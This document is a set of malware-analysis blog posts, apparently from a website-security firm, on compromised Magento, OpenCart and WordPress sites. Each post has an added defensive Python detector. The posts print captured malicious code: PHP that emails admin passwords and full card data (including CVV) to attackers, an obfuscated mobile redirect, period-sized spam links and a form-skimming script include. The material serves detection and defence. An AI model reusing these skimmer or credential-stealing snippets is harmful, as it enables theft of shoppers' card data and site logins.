
While analyzing a compromised Magento site, we found another Credit Card (CC) stealer variation. We have posted a few times about this type of malware, but this one is different in that it also steals the login credentials of the site's administrators. None of the samples we analyzed before had that behaviour.

The malicious code was found inside the app/code/core/Mage/Admin/Model/Session.php file and emails every admin username and password to the attacker (the recipient address is redacted below):

class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
{
    ...skipped code...
    // Attacker-added method: builds "user|password|email|request-uri" and mails it out
    protected function testReview($username, $password, $email)
    {
        $to = 'removed@removed.dom';
        $subject = 'Webserver';
        $message = $username.'|'.$password.'|'.$email.'|'.$_SERVER['REQUEST_URI'];
        $headers = 'From: removed@removed.dom' . "\r\n" .
            'Reply-To: removed@removed.dom' . "\r\n" .
            'X-Mailer: PHP/' . phpversion();

        mail($to, $subject, $message, $headers);
    }
    ...skipped code...
    public function login($username, $password, $request = null)
    {
        ...skipped code...
        if ($user->getId()) {
            // Attacker-added call: fires on every successful admin login, before the session is renewed
            $this->testReview($username, $password, $user->getEmail());
            $this->renewSession();
            ...skipped code...
    ...skipped code...

This is the first time we have seen Magento malware that steals credentials alongside credit card numbers. If you use Magento as your e-commerce solution, always check your core files for modifications and run regular scans. As always, if you need a professional service for your website, you can count on Sucuri.

We have previously analyzed many credit card stealers, especially ones targeting the Magento platform:

However, this type of malicious code is not only used against Magento; we often see it on other e-commerce platforms too. To give an example, while analyzing a compromised OpenCart site we found the following entry in the file catalog/controller/payment/authorizenet_aim.php:

// Attacker-added: every field of the order, including the card number and CVV, is joined with "|" and mailed out
$smail = $order_info['order_id'] . "|" . $order_info['payment_firstname'] . "|" . $order_info['payment_lastname'] .
    "|" . $order_info['payment_address_1'] . "|" . $order_info['payment_city'] . "|" .
    $order_info['payment_postcode'] . "|" . $order_info['payment_zone'] .
    "|" . $order_info['payment_country'] . "|" . $order_info['telephone'] . "|" . $this->request->post['cc_expire_date_month'] .
    "|" . $this->request->post['cc_expire_date_year'] . "|" . $this->request->post['cc_cvv2'] . "|" . $this->request->post['cc_number'];
mail("swordsofnorthshirei@yopmail.com", "infectedOpenCart", $smail, "From: infected@anotheropencartsite.dom\r\nReply-to: bademail@yopmail.com");

If you are not familiar with PHP: this code collects all the credit card transaction data (name, address, card number, expiry date, CVV, etc.) and emails it to swordsofnorthshirei@yopmail.com. Yopmail(.)com is a service that provides disposable e-mail inboxes.

As you can see, e-commerce sites (and their customers) have a lot more to lose when compromised, because they process critical information from their users. Whenever possible, we recommend using third-party payment providers like Stripe or PayPal to reduce your PCI scope, and not letting credit card data pass through your site at all.
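Both the Magento and the OpenCart snippets share one telltale: a call to PHP's mail() whose body is built from a password or card field, often addressed to a throwaway mailbox. The scanner below runs that heuristic over PHP source. It is an added example, not code from the original post or from Sucuri; the file paths are the ones the notes name, but the file contents are constructed, abbreviated stand-ins, and every disposable-mail domain other than yopmail.com is an assumption.

```python
import re

# Constructed stand-ins for PHP files read from disk, modelled on the two snippets
# in the notes above. Paths are the ones the notes name; contents are abbreviated.
SAMPLES = {
    "app/code/core/Mage/Admin/Model/Session.php": r'''
        $to = 'removed@removed.dom';
        $message = $username.'|'.$password.'|'.$email.'|'.$_SERVER['REQUEST_URI'];
        mail($to, $subject, $message, $headers);
    ''',
    "catalog/controller/payment/authorizenet_aim.php": r'''
        $smail=$order_info['order_id']."|".$this->request->post['cc_cvv2']."|".$this->request->post['cc_number'];
        mail("someone@yopmail.com","infectedOpenCart",$smail,"From: shop@example.invalid");
    ''',
    "app/code/core/Mage/Core/Model/Email.php": r'''
        // legitimate transactional mail: body comes from a template, nothing is concatenated in
        mail($this->getToEmail(), $this->getSubject(), $this->getBody(), $headers);
    ''',
}

# Variable or array-key fragments that must never be concatenated into an outbound mail body.
SENSITIVE = re.compile(r"password|passwd|cc_number|cc_cvv|cvv|card_number|expire", re.I)
# Disposable-mailbox providers: yopmail.com is from the OpenCart note, the rest are assumed.
DISPOSABLE = ("yopmail.com", "mailinator.com", "guerrillamail.com")

MAIL_CALL = re.compile(r"\bmail\s*\(", re.I)
ASSIGN = re.compile(r"(\$\w+)\s*=\s*(.+?);", re.S)


def mail_args(src, start):
    """Return the text between the parentheses of the mail( call at `start`."""
    open_at = src.index("(", start)
    depth = 0
    for i in range(open_at, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_at + 1:i]
    return src[open_at + 1:]


def scan_php(path, src):
    """Return [(path, offset, [reasons])] for every suspicious mail() call in one file."""
    findings = []
    assigns = dict(ASSIGN.findall(src))  # $var -> right-hand side text
    for m in MAIL_CALL.finditer(src):
        args = mail_args(src, m.start())
        # Follow one level of indirection: mail(..., $message, ...) with $message = ...
        expanded = args + " " + " ".join(rhs for var, rhs in assigns.items() if var in args)
        reasons = []
        if SENSITIVE.search(expanded):
            reasons.append("sensitive data in mail body")
        if any(d in expanded.lower() for d in DISPOSABLE):
            reasons.append("disposable recipient")
        if reasons:
            findings.append((path, m.start(), reasons))
    return findings


def scan_all(files):
    """Scan a {path: source} mapping; returns {path: findings}, with empty lists for clean files."""
    return {path: scan_php(path, src) for path, src in files.items()}


if __name__ == "__main__":
    for path, found in scan_all(SAMPLES).items():
        for _, offset, reasons in found:
            print(f"{path}: mail() at byte {offset}: {', '.join(reasons)}")
```

Run it over a real tree by replacing SAMPLES with the result of reading every .php file under the store root; the one-level taint tracking is deliberately crude, so treat hits as leads for a diff against a pristine copy of the platform rather than as verdicts.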

If you run OpenCart or any other ecommerce platform, check out our Sucuri Firewall to protect your site from attacks and compromises.

We recently found a website that was redirecting mobile users to a third-party site, chickenkiller .com. Further investigation showed that the malware had been injected into the database rather than into files, and that the code was hex encoded so that searching the malicious code for the domain name would turn up nothing.

The malware was stored in the wp_options table, in the option_value column of the row with ID 3284 (the row ID will differ between infections).

Here's a snippet of the code you may find on infected sites:

a:1:{s:7:"padding";s:1888:"</script><script>var _0x93d9=["\x77\x70\x6B\x6A","\x63\x6F\x6F\x6B\x69\x65","\x3D"
,"\x3B\x20\x70\x61\x74\x68\x3D\x2F","\x3B","\x73\x70\x6C\x69\x74","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67"
,"\x63\x68\x61\x72\x41\x74","\x20","\x69\x6E\x64\x65\x78\x4F\x66"];
if(!readCookie(_0x93d9[0])){createCookie(_0x93d9[0],_0x93d9[1],1);if(/iPhone|iPad|iPod/i[_0x93d9[1]]
(navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[4]}else {if(/Android/i[_0x93d9[1]](navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[5]}};};

The obfuscation is not complex. Once deobfuscated, the most interesting part is the conditional redirect, which shows that the malware used two different final URLs depending on the mobile operating system:

    if (!readCookie("wpkj")) {
        createCookie("wpkj", "test", 1);
        if (/iPhone|iPad|iPod/i.test(navigator.userAgent)) {
            window.location = "http:// load-me.chickenkiller .com/5972";
        } else {
            if (/Android/i.test(navigator.userAgent)) {
                window.location = "http:// load-me.chickenkiller .com/596F";
            }
        }
    }

What we learn from this sample is that checking only your site's files for anomalies is not enough. Once a site is compromised, the attacker can also add malicious content to its database, whether a backdoor or a conditional redirect for mobile visitors.
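The _0xNNNN string-array trick used above is mechanical to undo: decode the \xNN escapes, then substitute each _0x93d9[i] reference with the i-th literal. The script below does exactly that and then lists the redirect targets. It is an added example, not code from the original post. The page's own array is included as decoding input, but the snippet that gets resolved is a constructed one in the same style with placeholder .invalid hosts, because the array shown above (cookie-helper strings) does not line up with the indices the redirect fragment uses.

```python
import json
import re

# The string array from the injected script above, as input for the decoder.
PAGE_ARRAY = (
    r'var _0x93d9=["\x77\x70\x6B\x6A","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x70\x61\x74\x68\x3D\x2F",'
    r'"\x3B","\x73\x70\x6C\x69\x74","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67",'
    r'"\x63\x68\x61\x72\x41\x74","\x20","\x69\x6E\x64\x65\x78\x4F\x66"];'
)

# Constructed sample in the same style, with an array that matches the redirect code's indices.
# The hosts are placeholders (.invalid), not the domain from the real infection.
SAMPLE_JS = (
    r'var _0x93d9=["\x77\x70\x6B\x6A","\x74\x65\x73\x74","\x75\x73\x65\x72\x41\x67\x65\x6E\x74",'
    r'"\x6C\x6F\x63\x61\x74\x69\x6F\x6E",'
    r'"\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x64\x69\x72\x2E\x69\x6E\x76\x61\x6C\x69\x64\x2F\x61",'
    r'"\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x64\x69\x72\x2E\x69\x6E\x76\x61\x6C\x69\x64\x2F\x62"];'
    r'if(!readCookie(_0x93d9[0])){createCookie(_0x93d9[0],_0x93d9[1],1);'
    r'if(/iPhone|iPad|iPod/i[_0x93d9[1]](navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[4]}'
    r'else{if(/Android/i[_0x93d9[1]](navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[5]}}};'
)

ARRAY_DECL = re.compile(r"var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\];", re.S)
STR_LIT = re.compile(r'"((?:[^"\\]|\\.)*)"')
HEX_ESC = re.compile(r"\\x([0-9A-Fa-f]{2})")


def unescape(s):
    """Turn \\xNN escapes back into characters (the only escape this obfuscator emits)."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)


def decode_arrays(js):
    """Map every `var _0x....=[...]` declaration to its decoded string list."""
    return {
        name: [unescape(s) for s in STR_LIT.findall(body)]
        for name, body in ARRAY_DECL.findall(js)
    }


def resolve(js):
    """Inline array references as string literals, then rewrite obj["prop"] as obj.prop."""
    out = js
    for name, values in decode_arrays(js).items():
        ref = re.compile(re.escape(name) + r"\[(\d+)\]")
        out = ref.sub(lambda m: json.dumps(values[int(m.group(1))]), out)
    return re.sub(r'\["([A-Za-z_$][\w$]*)"\]', r".\1", out)


def redirect_targets(js):
    """List the URLs assigned to window.location in the resolved script."""
    return re.findall(r'window\.location\s*=\s*"([^"]+)"', resolve(js))


if __name__ == "__main__":
    print(decode_arrays(PAGE_ARRAY))
    print(resolve(SAMPLE_JS))
    print(redirect_targets(SAMPLE_JS))
```

Feed it the raw option_value after stripping the PHP-serialization wrapper; because the hex escapes are decoded before the domain search, the "search the database for the domain" check that the encoding was meant to defeat works again.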

In black hat SEO schemes, some links don't need descriptive anchor keywords, for example when their only purpose is to help search engine crawlers discover newly created doorways. Even in such cases, though, the links have to be hidden from the webmasters of the hacked sites they are placed on.

Recently, our malware analyst Douglas Santos notified the labs about an increased number of database spam infections in which (mostly) pharma links were injected into legitimate blog posts. What is interesting about these infections is how the hackers make the links invisible. They didn't add any invisible blocks or any additional text at all; they just turned parts of the existing blog content into links. Of course they realized that underlines and a changing mouse cursor would reveal that some words had unexpectedly become clickable, so to minimize exposure they (1) used the text-decoration:none style to get rid of the underlines and (2) chose the text fragments with the smallest footprint: the periods at the end of sentences.

... some legitimate text
<a style="text-decoration:none" href="/index.php?w=coversyl-online-bestellen-legal">.</a>

Such links are virtually invisible to human visitors, yet when search engines crawl the compromised site they discover links to spammy doorways (e.g. http://infectedwebsite .com/index.php?w=coversyl-online-bestellen-legal in this particular case).

This trick is clever, but it only fools people who rely on visual inspection of the page. To security scanners like SiteCheck or Unmask Parasites such period-links are as visible as any other link, so the infection is easily detected.
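Anchors whose only visible text is a period, combined with text-decoration:none, are easy to spot programmatically. The check below, an added example that is neither part of the original post nor SiteCheck's code, walks every anchor in a post body and flags those with punctuation-only text or link-hiding inline styles. The HTML is a constructed sample that includes the period-link from above plus a second, comma-sized link hidden with font-size:0.

```python
import re
from html.parser import HTMLParser

# Constructed post body: the period-link from above, a comma-link hidden with font-size:0,
# and two ordinary links that should not be flagged.
SAMPLE_POST = """
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit<a style="text-decoration:none" href="/index.php?w=coversyl-online-bestellen-legal">.</a>
Read our <a href="/about/">about page</a> for details<a href="/index.php?w=cheap-pills" style="font-size:0">,</a></p>
<p>See also the <a href="/faq/">FAQ</a>.</p>
"""

# Inline styles that make a link hard to notice visually.
HIDING_STYLE = re.compile(
    r"text-decoration\s*:\s*none|font-size\s*:\s*0|display\s*:\s*none|visibility\s*:\s*hidden", re.I
)


class LinkCollector(HTMLParser):
    """Collect (href, style, visible text) for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._open = None  # (href, style, text parts) while inside an <a>

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            a = dict(attrs)
            self._open = (a.get("href") or "", a.get("style") or "", [])

    def handle_data(self, data):
        if self._open is not None:
            self._open[2].append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._open is not None:
            href, style, parts = self._open
            self.links.append((href, style, "".join(parts)))
            self._open = None


def suspicious_links(html):
    """Return [(href, visible_text, [reasons])] for anchors a human is unlikely to notice."""
    parser = LinkCollector()
    parser.feed(html)
    parser.close()
    out = []
    for href, style, text in parser.links:
        visible = text.strip()
        reasons = []
        if len(visible) <= 1 and not visible.isalnum():
            reasons.append("anchor text is empty or a single punctuation mark")
        if HIDING_STYLE.search(style):
            reasons.append("inline style hides the link")
        if reasons:
            out.append((href, visible, reasons))
    return out


if __name__ == "__main__":
    for href, text, reasons in suspicious_links(SAMPLE_POST):
        print(f"{href!r} text={text!r}: {'; '.join(reasons)}")
```

Run it over post_content rows pulled from the database (not over rendered pages, where a theme may already strip or restyle the anchors); links flagged for both reasons are the strongest signal, since a legitimate editor rarely links a lone period.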

To make malicious injections look less suspicious, hackers like to use domains that look credible. It may be a typo domain like google-analystisc[.]com instead of google-analytics.com, or a correct domain name under a different TLD, e.g. ads.googleadservices[.]at or googleads.g.doubleclick[.]cn.com.

Sometimes they hide their scripts and iframes behind shortened URLs. Other times they upload malicious content to public services like Pastebin.

This time we discovered a script injection that used a site's alternative domain name, the one its hosting provider gives every client for free. In this case the malicious script was placed on a hacked site hosted on a Network Solutions server. Instead of using the site's real domain name, which could alert the webmaster of the hacked site once that domain got blacklisted, the hackers used its alternative 0055d7b.netsolhost[.]com address.

We found this code injected into multiple design/head/includes rows (different scopes) of the core_config_data table in the Magento database:

<script src="//0055d7b . netsolhost[.]com/Blog/lib2/js/js.js"> </script>

The script looks as if it comes from some Network Solutions CDN. However, it is a malicious script on a hacked site, where everything below /Blog was created by the attackers (for example, there is a PHProxy script under Blog/lib2/, a tool attackers use to make anonymous requests to third-party sites, e.g. to access backdoors). The js.js script itself adds event handlers that intercept all data entered into every HTML form on the infected Magento site and send it to a PHP script on the same Network Solutions server, 0055d7b .netsolhost[.]com/Blog/lib2/js/main.php. In practice the script is used to steal credit card and other sensitive payment details from order forms on e-commerce sites, although it can just as well steal credentials from login forms.

Don't trust third-party content just because it comes from a reputable-looking domain. Always double-check anything you don't recognize or don't believe should be on your site, verify the integrity of both your database and the files on your server, and monitor your site for security issues.
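The practical check for this class of injection is an allowlist of script hosts applied to the database rows that render into the page head. The audit below is an added example, not Sucuri's or Magento's code: it takes rows shaped like core_config_data (scope, scope_id, path, value), extracts every external script src, and flags hosts that are not on the allowlist, with a fuzzy comparison of the second-level label to catch the typo-domain and wrong-TLD patterns mentioned earlier. The rows, the allowed-host set, the .example hostnames and the 0.8 lookalike threshold are all constructed or assumed.

```python
import difflib
import re
from urllib.parse import urlsplit

# Constructed stand-in for Magento's core_config_data rows: (scope, scope_id, path, value).
# Hostnames under .example are placeholders for the hosts discussed in the note above.
ROWS = [
    ("default", 0, "design/head/includes",
     '<link rel="stylesheet" href="/skin/frontend/base/default/css/styles.css" />'),
    ("stores", 1, "design/head/includes",
     '<script src="//0055d7b.netsolhost.example/Blog/lib2/js/js.js"> </script>'),
    ("websites", 1, "design/head/includes",
     '<script type="text/javascript" src="https://www.google-analytics.com/analytics.js"></script>'),
    ("default", 0, "design/head/includes",
     '<script src="https://www.google-analystisc.example/ga.js"></script>'),
]

# Assumed: the external script hosts this shop legitimately uses.
ALLOWED_HOSTS = {"www.google-analytics.com"}
LOOKALIKE_RATIO = 0.8  # assumed threshold for flagging typo-domains

SCRIPT_SRC = re.compile(r"<script\b[^>]*\ssrc\s*=\s*[\"']([^\"']+)[\"']", re.I)


def host_of(src):
    """Hostname of a script src; None for same-origin relative paths."""
    if src.startswith("//"):  # protocol-relative, common in injections
        src = "https:" + src
    elif not re.match(r"^[a-z][a-z0-9+.-]*://", src, re.I):
        return None
    return urlsplit(src).hostname


def brand_label(host):
    """Second-level label, the part a typo-domain imitates (simplification: no public-suffix list)."""
    parts = host.split(".")
    return parts[-2] if len(parts) >= 2 else host


def classify(host, allowed):
    """'allowed', 'lookalike of <allowed host>' or 'unknown host'."""
    if host in allowed:
        return "allowed"
    for good in allowed:
        ratio = difflib.SequenceMatcher(None, brand_label(host), brand_label(good)).ratio()
        if ratio >= LOOKALIKE_RATIO:
            return f"lookalike of {good}"
    return "unknown host"


def audit(rows, allowed):
    """Return one finding per external script whose host is not on the allowlist."""
    findings = []
    for scope, scope_id, path, value in rows:
        for src in SCRIPT_SRC.findall(value):
            host = host_of(src)
            if host is None:
                continue
            verdict = classify(host, allowed)
            if verdict != "allowed":
                findings.append({"scope": f"{scope}/{scope_id}", "path": path,
                                 "src": src, "host": host, "reason": verdict})
    return findings


if __name__ == "__main__":
    for f in audit(ROWS, ALLOWED_HOSTS):
        print(f"{f['scope']} {f['path']}: {f['src']} ({f['reason']})")
```

Point it at a dump of core_config_data filtered to design/head/includes and design/footer/absolute_footer (and the equivalent option rows on other platforms); the scope column matters because, as in this case, the same injection is often repeated once per store view.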
